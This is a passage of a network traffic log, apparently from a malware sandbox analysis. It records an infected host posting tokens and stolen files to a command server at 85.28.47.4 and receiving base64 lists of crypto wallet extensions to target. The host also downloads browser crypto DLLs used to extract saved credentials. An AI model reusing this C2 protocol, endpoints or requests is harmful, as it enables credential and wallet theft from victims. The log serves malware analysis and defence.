                                            Data Ascii: fGRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfDF8MHwwfEtlZXBlciBXYWxsZXR8bHBpbGJuaWlhYmFja2RqY2lvbmtvYmdsbWRkZmJjam98MXwwfDB8U29sZmxhcmUgV2FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWd
                                            Jul 2, 2024 08:26:19.892790079 CEST1236INData Raw: 49 45 46 77 64 47 39 7a 49 46 64 68 62 47 78 6c 64 48 78 77 61 47 74 69 59 57 31 6c 5a 6d 6c 75 5a 32 64 74 59 57 74 6e 61 32 78 77 61 32 78 71 61 6d 31 6e 61 57 4a 76 61 47 35 69 59 58 77 78 66 44 42 38 4d 48 78 51 5a 58 52 79 59 53 42 42 63 48
                                            Data Ascii: IEFwdG9zIFdhbGxldHxwaGtiYW1lZmluZ2dtYWtna2xwa2xqam1naWJvaG5iYXwxfDB8MHxQZXRyYSBBcHRvcyBXYWxsZXR8ZWpqbGFkaW5uY2tkZ2plbWVrZWJkcGVva2Jpa2hmY2l8MXwwfDB8TWFydGlhbiBBcHRvcyBXYWxsZXR8ZWZiZ2xnb2ZvaXBwYmdjamVwbmhpYmxhaWJjbmNsZ2t8MXwwfDB8RmlubmllfGNqbWt
                                            Jul 2, 2024 08:26:19.892802000 CEST700INData Raw: 59 57 5a 6a 61 48 77 78 66 44 42 38 4d 48 78 4e 57 55 74 4a 66 47 4a 74 61 57 74 77 5a 32 39 6b 63 47 74 6a 62 47 35 72 5a 32 31 75 63 48 42 6f 5a 57 68 6b 5a 32 4e 70 62 57 31 70 5a 47 56 6b 66 44 46 38 4d 48 77 77 66 46 4e 77 62 47 6c 72 61 58
                                            Data Ascii: YWZjaHwxfDB8MHxNWUtJfGJtaWtwZ29kcGtjbG5rZ21ucHBoZWhkZ2NpbW1pZGVkfDF8MHwwfFNwbGlraXR5fGpoZmpmY2xlcGFjb2xkbWpta21kbG1nYW5mYWFsa2xifDF8MHwwfENvbW1vbktleXxjaGdmZWZqcGNvYmZibnBtaW9rZmpqYWdsYWhtbmRlZHwxfDB8MHxab2hvIFZhdWx0fGlna3Bjb2RoaWVvbXBlbG9uY2Z
                                            Jul 2, 2024 08:26:19.928910971 CEST465OUTPOST /920475a59bac849d.php HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=----KJDGIJECFIEBFIDHCGHD
                                            Host: 85.28.47.4
                                            Content-Length: 268
                                            Connection: Keep-Alive
                                            Cache-Control: no-cache
                                            Data Raw: 2d 2d 2d 2d 2d 2d 4b 4a 44 47 49 4a 45 43 46 49 45 42 46 49 44 48 43 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 36 33 66 61 33 65 39 61 30 64 35 33 62 66 61 32 39 38 63 61 38 63 63 63 62 31 31 65 39 36 64 64 61 61 38 66 33 65 32 37 63 35 61 64 32 66 30 62 30 62 62 38 33 38 33 38 38 36 63 66 37 38 66 39 62 65 33 39 65 38 34 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 47 49 4a 45 43 46 49 45 42 46 49 44 48 43 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 47 49 4a 45 43 46 49 45 42 46 49 44 48 43 47 48 44 2d 2d 0d 0a
                                            Data Ascii: ------KJDGIJECFIEBFIDHCGHDContent-Disposition: form-data; name="token"763fa3e9a0d53bfa298ca8cccb11e96ddaa8f3e27c5ad2f0b0bb8383886cf78f9be39e84------KJDGIJECFIEBFIDHCGHDContent-Disposition: form-data; name="message"fplugins------KJDGIJECFIEBFIDHCGHD--
                                            Jul 2, 2024 08:26:20.107259989 CEST335INHTTP/1.1 200 OK
                                            Date: Tue, 02 Jul 2024 06:26:20 GMT
                                            Server: Apache/2.4.41 (Ubuntu)
                                            Vary: Accept-Encoding
                                            Content-Length: 108
                                            Keep-Alive: timeout=5, max=97
                                            Connection: Keep-Alive
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38
                                            Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
                                            Jul 2, 2024 08:26:20.150187969 CEST198OUTPOST /920475a59bac849d.php HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=----IIJDBAKKKFBFHIDGIIEH
                                            Host: 85.28.47.4
                                            Content-Length: 6063
                                            Connection: Keep-Alive
                                            Cache-Control: no-cache
                                            Jul 2, 2024 08:26:20.150264025 CEST6063OUTData Raw: 2d 2d 2d 2d 2d 2d 49 49 4a 44 42 41 4b 4b 4b 46 42 46 48 49 44 47 49 49 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 36 33 66 61 33
                                            Data Ascii: ------IIJDBAKKKFBFHIDGIIEHContent-Disposition: form-data; name="token"763fa3e9a0d53bfa298ca8cccb11e96ddaa8f3e27c5ad2f0b0bb8383886cf78f9be39e84------IIJDBAKKKFBFHIDGIIEHContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
                                            Jul 2, 2024 08:26:20.945147991 CEST202INHTTP/1.1 200 OK
                                            Date: Tue, 02 Jul 2024 06:26:20 GMT
                                            Server: Apache/2.4.41 (Ubuntu)
                                            Content-Length: 0
                                            Keep-Alive: timeout=5, max=96
                                            Connection: Keep-Alive
                                            Content-Type: text/html; charset=UTF-8
                                            Jul 2, 2024 08:26:21.217550039 CEST89OUTGET /69934896f997d5bb/sqlite3.dll HTTP/1.1
                                            Host: 85.28.47.4
                                            Cache-Control: no-cache
                                            Jul 2, 2024 08:26:21.394440889 CEST1236INHTTP/1.1 200 OK
                                            Date: Tue, 02 Jul 2024 06:26:21 GMT
                                            Server: Apache/2.4.41 (Ubuntu)
                                            Last-Modified: Mon, 05 Sep 2022 14:30:30 GMT
                                            ETag: "10e436-5e7eeebed8d80"
                                            Accept-Ranges: bytes
                                            Content-Length: 1106998
                                            Content-Type: application/x-msdos-program
                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: *0@< .text%&`P`.data|'@(,@`.rdatapDpFT@`@.bss(`.edata*,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70
                                            Jul 2, 2024 08:26:21.394474983 CEST1236INData Raw: 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00
                                            Data Ascii: #N@B/81s:<R@B/92P @B
                                            Jul 2, 2024 08:26:21.394484997 CEST448INData Raw: ec 0c 89 c5 85 db 74 05 83 fb 03 75 2e 89 7c 24 08 89 5c 24 04 89 34 24 e8 19 f7 0a 00 83 ec 0c 89 c5 89 7c 24 08 89 5c 24 04 89 34 24 e8 64 fd ff ff 83 ec 0c 85 c0 75 02 31 ed c7 05 48 67 eb 61 ff ff ff ff 83 c4 1c 89 e8 5b 5e 5f 5d c3 8d b4 26
                                            Data Ascii: tu.|$\$4$|$\$4$du1Hga[^_]&+C|$\$4$w#t|$\$4$u#u|$D$4$t&up|$D$4$rZ|$D$4$Q
                                            Jul 2, 2024 08:26:21.394495010 CEST1236INData Raw: 0e 70 eb 61 89 04 24 ff 15 80 02 ed 61 52 52 89 c2 85 d2 74 09 c7 04 24 78 67 eb 61 ff d2 c7 04 24 96 14 e0 61 e8 fc e2 0a 00 c9 c3 55 89 e5 5d c3 90 03 14 85 a0 c3 ec 61 55 89 e5 89 14 85 a0 c3 ec 61 83 c0 08 3b 14 85 a8 c3 ec 61 76 07 89 14 85
                                            Data Ascii: pa$aRRt$xga$aU]aUa;ava]tUS$R[]UWVS,u}L$T$$t$|$S,[^_]UWVS,u}L$T$$t$|$S,[^_]UV0T$L$$V^]
                                            Jul 2, 2024 08:26:21.394556999 CEST1236INData Raw: 08 8d 7e ff 38 da 75 0d 3a 54 08 01 75 0f 88 54 30 ff 41 eb 04 88 5c 30 ff 41 46 eb e1 5b c6 04 38 00 5e 5f 5d c3 55 89 e5 56 53 31 db 0f b6 0c 18 0f b6 34 1a 39 f1 75 06 85 c9 75 14 eb 15 0f b6 89 e0 a2 ec 61 0f b6 b6 e0 a2 ec 61 29 f1 75 03 43
                                            Data Ascii: ~8u:TuT0A\0AF[8^_]UVS149uuaa)uC[^]UEUu1t]]UWVMSU}u1KtBOG1x4aa)t2a8auAB[^_]U1
                                            Jul 2, 2024 08:26:22.620188951 CEST198OUTPOST /920475a59bac849d.php HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=----DBKFHCFBGIIJKFHJDHDH
                                            Host: 85.28.47.4
                                            Content-Length: 4599
                                            Connection: Keep-Alive
                                            Cache-Control: no-cache
                                            Jul 2, 2024 08:26:23.354068995 CEST202INHTTP/1.1 200 OK
                                            Date: Tue, 02 Jul 2024 06:26:22 GMT
                                            Server: Apache/2.4.41 (Ubuntu)
                                            Content-Length: 0
                                            Keep-Alive: timeout=5, max=94
                                            Connection: Keep-Alive
                                            Content-Type: text/html; charset=UTF-8
                                            Jul 2, 2024 08:26:23.455642939 CEST198OUTPOST /920475a59bac849d.php HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=----HCFIJKKKKKFCAAAAFBKF
                                            Host: 85.28.47.4
                                            Content-Length: 1451
                                            Connection: Keep-Alive
                                            Cache-Control: no-cache
                                            Jul 2, 2024 08:26:24.269479990 CEST202INHTTP/1.1 200 OK
                                            Date: Tue, 02 Jul 2024 06:26:23 GMT
                                            Server: Apache/2.4.41 (Ubuntu)
                                            Content-Length: 0
                                            Keep-Alive: timeout=5, max=93
                                            Connection: Keep-Alive
                                            Content-Type: text/html; charset=UTF-8
                                            Jul 2, 2024 08:26:24.282278061 CEST556OUTPOST /920475a59bac849d.php HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=----CGIJKJJKEBGHJKFIDGCA
                                            Host: 85.28.47.4
                                            Content-Length: 359
                                            Connection: Keep-Alive
                                            Cache-Control: no-cache
                                            Data Raw: 2d 2d 2d 2d 2d 2d 43 47 49 4a 4b 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 36 33 66 61 33 65 39 61 30 64 35 33 62 66 61 32 39 38 63 61 38 63 63 63 62 31 31 65 39 36 64 64 61 61 38 66 33 65 32 37 63 35 61 64 32 66 30 62 30 62 62 38 33 38 33 38 38 36 63 66 37 38 66 39 62 65 33 39 65 38 34 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 4a 4b 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 4a 4b 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 [TRUNCATED]
                                            Data Ascii: ------CGIJKJJKEBGHJKFIDGCAContent-Disposition: form-data; name="token"763fa3e9a0d53bfa298ca8cccb11e96ddaa8f3e27c5ad2f0b0bb8383886cf78f9be39e84------CGIJKJJKEBGHJKFIDGCAContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------CGIJKJJKEBGHJKFIDGCAContent-Disposition: form-data; name="file"------CGIJKJJKEBGHJKFIDGCA--
                                            Jul 2, 2024 08:26:25.063440084 CEST202INHTTP/1.1 200 OK
                                            Date: Tue, 02 Jul 2024 06:26:24 GMT
                                            Server: Apache/2.4.41 (Ubuntu)
                                            Content-Length: 0
                                            Keep-Alive: timeout=5, max=92
                                            Connection: Keep-Alive
                                            Content-Type: text/html; charset=UTF-8
                                            Jul 2, 2024 08:26:25.427931070 CEST556OUTPOST /920475a59bac849d.php HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=----GHJDBAKEHDHDGCAKKJJE
                                            Host: 85.28.47.4
                                            Content-Length: 359
                                            Connection: Keep-Alive
                                            Cache-Control: no-cache
                                            Data Raw: 2d 2d 2d 2d 2d 2d 47 48 4a 44 42 41 4b 45 48 44 48 44 47 43 41 4b 4b 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 36 33 66 61 33 65 39 61 30 64 35 33 62 66 61 32 39 38 63 61 38 63 63 63 62 31 31 65 39 36 64 64 61 61 38 66 33 65 32 37 63 35 61 64 32 66 30 62 30 62 62 38 33 38 33 38 38 36 63 66 37 38 66 39 62 65 33 39 65 38 34 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 44 42 41 4b 45 48 44 48 44 47 43 41 4b 4b 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 44 42 41 4b 45 48 44 48 44 47 43 41 4b 4b 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a [TRUNCATED]
                                            Data Ascii: ------GHJDBAKEHDHDGCAKKJJEContent-Disposition: form-data; name="token"763fa3e9a0d53bfa298ca8cccb11e96ddaa8f3e27c5ad2f0b0bb8383886cf78f9be39e84------GHJDBAKEHDHDGCAKKJJEContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------GHJDBAKEHDHDGCAKKJJEContent-Disposition: form-data; name="file"------GHJDBAKEHDHDGCAKKJJE--
                                            Jul 2, 2024 08:26:26.133760929 CEST202INHTTP/1.1 200 OK
                                            Date: Tue, 02 Jul 2024 06:26:25 GMT
                                            Server: Apache/2.4.41 (Ubuntu)
                                            Content-Length: 0
                                            Keep-Alive: timeout=5, max=91
                                            Connection: Keep-Alive
                                            Content-Type: text/html; charset=UTF-8
                                            Jul 2, 2024 08:26:26.315326929 CEST89OUTGET /69934896f997d5bb/freebl3.dll HTTP/1.1
                                            Host: 85.28.47.4
                                            Cache-Control: no-cache
                                            Jul 2, 2024 08:26:26.497540951 CEST1236INHTTP/1.1 200 OK
                                            Date: Tue, 02 Jul 2024 06:26:26 GMT
                                            Server: Apache/2.4.41 (Ubuntu)
                                            Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
                                            ETag: "a7550-5e7ebd4425100"
                                            Accept-Ranges: bytes
                                            Content-Length: 685392
                                            Content-Type: application/x-msdos-program
                                            Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED]
                                            Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
                                            Jul 2, 2024 08:26:27.150688887 CEST89OUTGET /69934896f997d5bb/mozglue.dll HTTP/1.1
                                            Host: 85.28.47.4
                                            Cache-Control: no-cache
                                            Jul 2, 2024 08:26:27.336584091 CEST1236INHTTP/1.1 200 OK
                                            Date: Tue, 02 Jul 2024 06:26:27 GMT
                                            Server: Apache/2.4.41 (Ubuntu)
                                            Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
                                            ETag: "94750-5e7ebd4425100"
                                            Accept-Ranges: bytes
                                            Content-Length: 608080
                                            Content-Type: application/x-msdos-program
                                            Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED]
                                            Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
                                            Jul 2, 2024 08:26:27.728979111 CEST90OUTGET /69934896f997d5bb/msvcp140.dll HTTP/1.1
                                            Host: 85.28.47.4
                                            Cache-Control: no-cache
                                            Jul 2, 2024 08:26:27.905921936 CEST1236INHTTP/1.1 200 OK
                                            Date: Tue, 02 Jul 2024 06:26:27 GMT
                                            Server: Apache/2.4.41 (Ubuntu)
                                            Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
                                            ETag: "6dde8-5e7ebd4425100"
                                            Accept-Ranges: bytes
                                            Content-Length: 450024
                                            Content-Type: application/x-msdos-program
                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED]
                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
                                            Jul 2, 2024 08:26:28.219517946 CEST86OUTGET /69934896f997d5bb/nss3.dll HTTP/1.1
                                            Host: 85.28.47.4
                                            Cache-Control: no-cache
                                            Jul 2, 2024 08:26:28.396034956 CEST1236INHTTP/1.1 200 OK
                                            Date: Tue, 02 Jul 2024 06:26:28 GMT
                                            Server: Apache/2.4.41 (Ubuntu)
                                            Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
                                            ETag: "1f3950-5e7ebd4425100"
                                            Accept-Ranges: bytes
                                            Content-Length: 2046288
                                            Content-Type: application/x-msdos-program
                                            Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED]
                                            Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
                                            Jul 2, 2024 08:26:29.885649920 CEST90OUTGET /69934896f997d5bb/softokn3.dll HTTP/1.1
                                            Host: 85.28.47.4
                                            Cache-Control: no-cache
                                            Jul 2, 2024 08:26:30.062459946 CEST1236INHTTP/1.1 200 OK
                                            Date: Tue, 02 Jul 2024 06:26:29 GMT
                                            Server: Apache/2.4.41 (Ubuntu)
                                            Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
                                            ETag: "3ef50-5e7ebd4425100"
                                            Accept-Ranges: bytes
                                            Content-Length: 257872
                                            Content-Type: application/x-msdos-program
                                            Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED]
                                            Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data|@.00cfg@@.rsrc@@.reloc56@B
                                            Jul 2, 2024 08:26:30.279979944 CEST94OUTGET /69934896f997d5bb/vcruntime140.dll HTTP/1.1
                                            Host: 85.28.47.4
                                            Cache-Control: no-cache
                                            Jul 2, 2024 08:26:30.461354971 CEST1236INHTTP/1.1 200 OK
                                            Date: Tue, 02 Jul 2024 06:26:30 GMT
